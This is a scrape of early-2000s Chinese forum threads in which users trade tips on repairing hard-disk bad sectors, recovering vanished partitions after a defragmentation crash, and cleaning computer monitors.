er也升级成了3.0版本，从而使该项工作变得更加高效和简洁。另外，DiskManager这个软件也能做这个工作。隐藏了分区后，不要试图把坏道所在的分区的前后分区合并--那是徒劳无益的，因为这两个分区在物理上并不连续。

    4.对于硬盘0扇区损坏的情况，看起来比较棘手，但也不是无药可救--只要把报废的0扇区屏蔽，而用1扇区取而代之就行了，完成这项工作的理想软件是Pctools9.0，具体地说，是Pctools9.0中的DE工具，要注意的是，修改扇区完成后，只有对硬盘作格式化后才会把分区表的信息写入1扇区（现在作为0扇区了）。

    5.不到万不得已，这一招最好不要用：即对硬盘作低格。因为对硬盘作低格至少有两点害处：一是磨损盘片，二是对有坏道的硬盘来说，低格还会加速坏道的扩散。

    6.最后还有一点，那就是主板BIOS的相关内容要设置得当，特别是对于一些TX芯片组级别以前的主板，由于没有自动识别硬盘规格的能力，往往会因设置不当而影响硬盘的使用，轻则硬盘不能物尽其用，重则损伤硬盘。

barry

终级用户
积分：731
发帖：371
来自：上海
注册：2001-01-29
 发表于 2002-03-09 14:21:51 按此观看barry的个人资料 按此发邮件给barry 访问barry的主页 barry 的 oicq 是24319347,查看 24319347 的资料 发送悄悄话给barry 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看barry的IP
有坏道的硬盘最好扔掉

A bosom friend afar brings a distant land near.
海内存知己,天涯若比邻
上一贴 | 下一贴
快速回复 主题：硬盘坏道修复术
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


紧急情况！ - 经 典 论 坛

计算机技术
紧急情况！

上一贴 | 下一贴
发表人 主题: 紧急情况！
sonata

初级用户
积分：108
发帖：28
来自：河北省
注册：2001-09-05
 发表于 2002-03-05 13:11:04 按此观看sonata的个人资料 按此发邮件给sonata sonata 的 oicq 是18858351,查看 18858351 的资料 收藏该主题供以后查看 发送悄悄话给sonata 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sonata的IP
在用win98自带的磁盘碎片整理程序整理C盘的时候突然死机，重起后发现E、F盘失踪，请各位大侠帮帮忙，尽快给我答复！谢谢

只要再克制一下，我就会解脱 ！
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-05 13:13:07 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
用磁盘扫描检查一下！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

sonata

初级用户
积分：108
发帖：28
来自：河北省
注册：2001-09-05
 发表于 2002-03-05 13:28:49 按此观看sonata的个人资料 按此发邮件给sonata sonata 的 oicq 是18858351,查看 18858351 的资料 发送悄悄话给sonata 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sonata的IP
没用。找不着怎么扫描？

只要再克制一下，我就会解脱 ！
cvbfight

高级用户
积分：260
发帖：67
来自：
注册：2002-02-09
 发表于 2002-03-05 17:49:27 按此观看cvbfight的个人资料 按此发邮件给cvbfight 发送悄悄话给cvbfight 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cvbfight的IP
可能分区表破坏，试试用kv3000的拯救硬盘功能。

不懂什么，就喜欢插嘴。
F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-07 17:39:00 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
用DM；或DISKMEN最简单了恢复一下分区表就行了

=BULEIDEA=SOS
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-07 19:40:54 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
PQMAGIC!

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
话草

终级用户
积分：688
发帖：223
来自：
注册：2001-08-07
 发表于 2002-03-07 20:07:23 按此观看话草的个人资料 按此发邮件给话草 话草 的 oicq 是27721384,查看 27721384 的资料 发送悄悄话给话草 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看话草的IP
请打98 补丁

另外，你可以到dos 下 scandisk

Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-07 20:33:54 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
还是建议用PQ保险一些......

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-07 21:27:16 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
盘符找不到的兄弟你有几块硬盘？

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-03-07 22:34:55 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
先用FDISK看看，

解决问题才有进步
解决问题才有进步
sonata

初级用户
积分：108
发帖：28
来自：河北省
注册：2001-09-05
 发表于 2002-03-08 10:18:00 按此观看sonata的个人资料 按此发邮件给sonata sonata 的 oicq 是18858351,查看 18858351 的资料 发送悄悄话给sonata 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sonata的IP
谢谢各位大侠的关心。我已经用Norton diskdoctor搞定了。

只要再克制一下，我就会解脱 ！
上一贴 | 下一贴
快速回复 主题：紧急情况！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


拿什么擦显示器 ？ - 经 典 论 坛

计算机技术
拿什么擦显示器 ？ (页 1)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: 拿什么擦显示器 ？
浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-03-03 21:03:19 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 收藏该主题供以后查看 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

有专门的什么东西吗 ？

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-03 21:54:29 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
好像酒精棉球可以擦

::古落根门::

唯有不断学习 才能不断进步

51windows

海娃
积分：4495
发帖：1308
来自：湖南－山东
注册：2001-12-02
 发表于 2002-03-03 22:35:36 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP
其实用软东西加点水都行，

用酒精只是让它容易蒸发！

我的防尘照早就没有用过了，平时就是用卫生纸擦一下！

Blueidea Web Team.
Moderator Of Amphitheater Forum
.::天天学习:好好向上::. www.51windows.com
51window_asp_Beta

自在

终级用户
积分：1179
发帖：322
来自：京·北
注册：2002-03-04
 发表于 2002-03-04 02:56:59 按此观看自在的个人资料 按此发邮件给自在 自在 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给自在 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自在的IP
我用麂皮！

修 身　·　齐 家　·　治 业　·　平 天 下
wellcome to visit our BBS　BLUELUNIX
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-04 08:23:59 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引用:

显示平面上的尘埃可以用柔软干净的棉布轻轻擦去。若显示平面上沾有污垢，可将棉布稍稍沾湿后擦试。擦试时，不可用力过猛，更不可用刀片、硬物擦、刮。

引用:

显示器的清理与维护

STEP 1

    在开始清理和维护显示器之前先要将电脑显示器的开关断掉，并取下电源插头。目前市场上有很多种显示器专用的清洁蜡，打开盒盖可以看到里边的清洁海绵。用清洁海绵蘸上显示器专用的清洁蜡开始从上向下擦拭显示器。重点是显示器上视窗方向及排风口周围，由于长时间的高温工作，静电吸附了很多尘土，这些部位也是电脑显示器比较肮脏的地方。不过为了进一步避免化学物质的气味刺激，我们建议读者在使用清洁蜡除尘后，可再用软布将显示器外壳擦拭一遍。

STEP 2

    清洁完毕显示器的外壳后，下面就要清洁展示器的显示屏幕了。清洁显示屏一定不可以用水或其它水融性物质，否则会造成显示屏幕的过早老化或导致其它故障。可使用机皮上下规律地擦拭显示器屏幕，直至屏幕光可鉴人为止。

STEP 3

    这是一个“少儿不宜”的项目，普通用户不可尝试，因为我们马上就要打开显示器的后盖进行最终灰尘处理了。显示器刚刚关闭后切不可马上打开机器后盖进行除尘工作，至少要等到两小时以后。因为此时的显像管线包里积聚着大负荷的、足以致人于死命的强烈电荷，如果打开后且接触不慎，对人体十分有害。看到显示器后盖上面的那些螺丝了吧，用十字螺丝刀拧下这些螺丝就可以把显示器后盖掀开了。刷子和软布呢？现在终于派上用场了......用刷子彻底清理线包上和显示器壳内吸附的灰尘后，恢复该显示器的设计原状，这款用了近三年的显示器终于再次焕发了青春。

不过我比较懒，宿舍里很少有这些东西，都是直接用手擦的

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-03-04 08:28:27 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
超市有卖的那种20元一包的专用屏幕擦纸`.................

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-03-04 08:32:41 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
效果如何？

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-03-04 09:39:54 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

乾淨的棉布在什麽地方有賣的 ....

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
dancing

叶恨花
现任版主
积分：4737
发帖：2230
来自：|二进制情感天空|
注册：2000-12-11
 发表于 2002-03-04 10:10:42 按此观看dancing的个人资料 按此发邮件给dancing 发送悄悄话给dancing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看dancing的IP
浸食·花葬在上个帖子中说
引用:

乾淨的棉布在什麽地方有賣的 ....

Hospital.

情归秋雪缠绵叶，恨是西风寂寞花。最痛处，别后离愁… …

Blueidea Web Team
Moderator Of Photoshop & Imagerady Forum

onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-04 10:37:42 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
ImHow在上个帖子中说
引用:
好像酒精棉球可以擦

千万别拿酒精擦，屏幕上的保护膜就完蛋啦！！！
清水就好了！ ;)

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

imacwei

终级用户
积分：2348
发帖：1078
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-03-04 19:01:14 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
不要永酒精擦,会破坏保护膜!最好就是使用那种擦照相机镜头的专用纸!

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
巍笑

Vshine
积分：1807
发帖：1218
来自：江西南昌
注册：2001-11-16
 发表于 2002-03-04 19:19:57 按此观看巍笑的个人资料 按此发邮件给巍笑 访问巍笑的主页 巍笑 的 oicq 是419098,查看 419098 的资料 发送悄悄话给巍笑 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看巍笑的IP
用擦镜纸（擦显微镜的那种，不是餐巾纸：）

Vshi.com
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-04 19:45:53 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
麂皮很好，酒精之类的东东当然是绝对禁止的了，清洁济最好也不用，只有纯水才是真正合适的东东

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
desgin

终级用户
积分：1097
发帖：515
来自：江西-南昌
注册：2001-02-26
 发表于 2002-03-04 22:13:04 按此观看desgin的个人资料 按此发邮件给desgin 访问desgin的主页 desgin 的 oicq 是2620533,查看 2620533 的资料 发送悄悄话给desgin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看desgin的IP
挥挥衣袖显示器便干净了，何必花钱

=blueidea.tk=

piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-04 22:25:15 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
哈哈，如果这么说的话衣袖也不用挥了，反正怎么都能用

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
凌志

终级用户
积分：544
发帖：166
来自：鞍山
注册：2001-01-09
 发表于 2002-03-04 23:12:02 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
真是麻烦！

眼睛布、口罩！

网络天下
四海一家
arrive

终级用户
积分：1298
发帖：433
来自：大连
注册：2000-12-02
 发表于 2002-03-07 16:21:01 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
不能用酒精，涂层显然是有机物质，用酒精，你想一想，就知道会有什么后果，最好用镜头纸，没有？就用凉白开和纸巾！

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
中国坛中文网——网络技术版www.chinafen.com
F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-07 16:58:54 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
千万不能用酒精啊否则涂层就完了
最好就是鹿皮了呵呵
否则镜头纸也行啊

=BULEIDEA=SOS
YoyosToy

初级用户
积分：92
发帖：26
来自：U.F.O
注册：2001-12-20
 发表于 2002-03-07 22:32:14 按此观看YoyosToy的个人资料 按此发邮件给YoyosToy 访问YoyosToy的主页 YoyosToy 的 oicq 是76181941,查看 76181941 的资料 发送悄悄话给YoyosToy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看YoyosToy的IP
我最早是用鹿皮后来弄了屏保带了块布（其实就是眼镜布）比鹿皮好使！感觉用专门的眼镜布最好，因为眼镜一般都是加膜的和屏幕基本相似~！

http://hikki.cn.st
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-07 22:37:30 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
眼镜的膜和显示器的膜是相似的？？？？？？？？？？？？

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
AirTree

超级用户
积分：375
发帖：231
来自：无人地带
注册：2001-12-07
 发表于 2002-03-08 09:30:51 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
看不同的显示器啦。

我用的是MAG786FD，资料上显示其显示器表面涂有一层很薄的防辐射物质，平时不要过多的擦拭；即使擦也必须使用专用的屏幕清洁工具，如鹿皮、眼镜布等等。

打雷了！下雨了！大家快回家收衣服啊……
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-08 16:47:35 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
如果是液晶显示器（笔记本）呢？

::古落根门::

唯有不断学习 才能不断进步

YoyosToy

初级用户
积分：92
发帖：26
来自：U.F.O
注册：2001-12-20
 发表于 2002-03-08 23:08:56 按此观看YoyosToy的个人资料 按此发邮件给YoyosToy 访问YoyosToy的主页 YoyosToy 的 oicq 是76181941,查看 76181941 的资料 发送悄悄话给YoyosToy 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看YoyosToy的IP
好象液晶显示器（笔记本）用软布就行了~！

http://hikki.cn.st
wx@ay

看不懂
积分：7424
发帖：5353
来自：ay.ha.cn
注册：1999-12-23
 发表于 2002-03-08 23:46:43 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
只要是不会擦伤显示屏的都可以。例如用你的手擦擦也比不擦强

我认为主要是擦的方式问题。一般不要上下左右的擦，而应该是从
屏幕中心开始画圆，渐渐向屏幕边缘扩展。这样擦从来的效果比较好

Think like a Genius.

有些爱情象指甲，有些象牙齿。
指甲能不断生长，不要的就剪掉。
而牙齿就不同。
象牙齿的爱情会不同，它会永远！
小心蛀牙！！！

浸食·花葬

极度色郎
积分：7812
发帖：2959
来自：|翅膀|
注册：2001-07-09
 发表于 2002-03-09 00:14:39 按此观看浸食·花葬的个人资料 按此发邮件给浸食·花葬 访问浸食·花葬的主页 浸食·花葬 的 oicq 是7368317,查看 7368317 的资料 发送悄悄话给浸食·花葬 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看浸食·花葬的IP

这个帖好象被洗了一样 呵呵

现在我的743df已经习惯用纯净水+纸巾了 ~

伤不伤就不管了 反正过段日子买19的 ....

幕末 ——
京都に人斬り拔刀齋と呼ばれた志士がぃた.
修羅さながらに人を斬り.その血刀を以って新
時代『明治』を切り拓ぃたその男は.動亂の
終結と共に人々の前から姿を消した ——
毛毛1985

初级用户
积分：57
发帖：16
来自：沈阳市
注册：2002-02-01
 发表于 2002-03-09 00:23:02 按此观看毛毛1985的个人资料 按此发邮件给毛毛1985 毛毛1985 的 oicq 是95141901,查看 95141901 的资料 发送悄悄话给毛毛1985 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看毛毛1985的IP
实际上，经常的擦一擦，不用那么认真只要不让显示器太脏就行了
不太脏就不用用专一的用具擦！

我是一个初学者，请大家指教好吗？
毛毛1985

初级用户
积分：57
发帖：16
来自：沈阳市
注册：2002-02-01
 发表于 2002-03-09 00:27:01 按此观看毛毛1985的个人资料 按此发邮件给毛毛1985 毛毛1985 的 oicq 是95141901,查看 95141901 的资料 发送悄悄话给毛毛1985 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看毛毛1985的IP
但是显示器也不要太勤的擦，这样的话也会把显示器上的保护膜擦坏的！

我是一个初学者，请大家指教好吗？
yunbin

经典强盗
现任版主
积分：2397
发帖：1033
来自：火星
注册：2001-09-27
 发表于 2002-03-09 09:21:57 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
我的笔记本屏幕从来都是用柔软的面纸+水擦第一遍 再用眼睛布擦第二遍 很干净.

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

sofire

初级用户
积分：37
发帖：10
来自：
注册：2002-03-09
 发表于 2002-03-09 09:40:08 按此观看sofire的个人资料 按此发邮件给sofire 发送悄悄话给sofire 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sofire的IP
带点漂白粉的自来水是不是用起来效果会更好一点。
偶学校的水都是想奶一样白的。

i love you,my red red rose!
li88yi

终级用户
积分：911
发帖：439
来自：PX.JX.CN
注册：2000-08-25
 发表于 2002-03-09 14:07:05 按此观看li88yi的个人资料 按此发邮件给li88yi li88yi 的 oicq 是762429,查看 762429 的资料 发送悄悄话给li88yi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看li88yi的IP
纯酒精吧?

无可救药....
这个主题共有2页：1 2 上一贴 | 下一贴
快速回复 主题：拿什么擦显示器 ？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


拿什么擦显示器 ？ - 经 典 论 坛

计算机技术
拿什么擦显示器 ？ (页 2)

这个主题共有2页：1 2 上一贴 | 下一贴
发表人 主题: 拿什么擦显示器 ？
纵横网络

超级用户
积分：341
发帖：132
来自：东莞厚街
注册：2002-02-28
 发表于 2002-03-09 14:57:43 按此观看纵横网络的个人资料 按此发邮件给纵横网络 访问纵横网络的主页 纵横网络 的 oicq 是99693993,查看 99693993 的资料 发送悄悄话给纵横网络 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看纵横网络的IP
你们习惯用什么擦光碟那就用同样的东西擦显示器就没问题了。加点擦磁头的洗洁液。这样会更好的效果。

好好学习，天天向上。
sony

终级用户
积分：1222
发帖：329
来自：浙江省
注册：2001-10-05
 发表于 2002-03-09 20:05:59 按此观看sony的个人资料 按此发邮件给sony sony 的 oicq 是27869008,查看 27869008 的资料 发送悄悄话给sony 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看sony的IP
用力擦

许多夜晚，你轻柔地依偎在我的身上，用纤纤秀手触摸我身上娇嫩的地方，用小巧细嘴吸出我珍贵的体液，直到满足十分才肯松口离开，唉，这该死的蚊子。
imacwei

终级用户
积分：2348
发帖：1078
来自：China.Jiangs
注册：2001-07-23
 发表于 2002-03-09 20:54:37 按此观看imacwei的个人资料 按此发邮件给imacwei 访问imacwei的主页 imacwei 的 oicq 是36110975,查看 36110975 的资料 发送悄悄话给imacwei 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看imacwei的IP
sony在上个帖子中说
引用:
用力擦

那还不如用拖把拖呢？
只要注意保护涂层，千万不要用酒精！

Loading…………
WINDOWS2000-SP2+IE5.5
FIREWORKS,the solution for professional Web graphic design and production.
Press Anykey To Continue…

iMacWei
rori

初级用户
积分：25
发帖：8
来自：西安，陕西
注册：2002-02-03
 发表于 2002-03-10 15:04:30 按此观看rori的个人资料 按此发邮件给rori 访问rori的主页 rori 的 oicq 是214168,查看 214168 的资料 发送悄悄话给rori 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看rori的IP
记得书上说是不能用水的，但是我还是用水了！

人生只似风中絮，悲也零星，欢也零星，都在连江点点萍..........
Cinkey

我和我追逐的梦
积分：1138
发帖：2440
来自：杭州
注册：2001-06-21
 发表于 2002-03-10 15:31:51 按此观看Cinkey的个人资料 按此发邮件给Cinkey 访问Cinkey的主页 Cinkey 的 oicq 是23516844,查看 23516844 的资料 发送悄悄话给Cinkey 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Cinkey的IP
在擦螢幕的時候我從來不用任何液體,只用棉花.......

 悠 長 假 期   |  反恐联盟  |  CS服务器状态查看
数码狂人

终级用户
积分：1357
发帖：385
来自：只有数字的世界
注册：2001-09-30
 发表于 2002-03-10 15:49:28 按此观看数码狂人的个人资料 按此发邮件给数码狂人 访问数码狂人的主页 数码狂人 的 oicq 是1478222,查看 1478222 的资料 发送悄悄话给数码狂人 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看数码狂人的IP
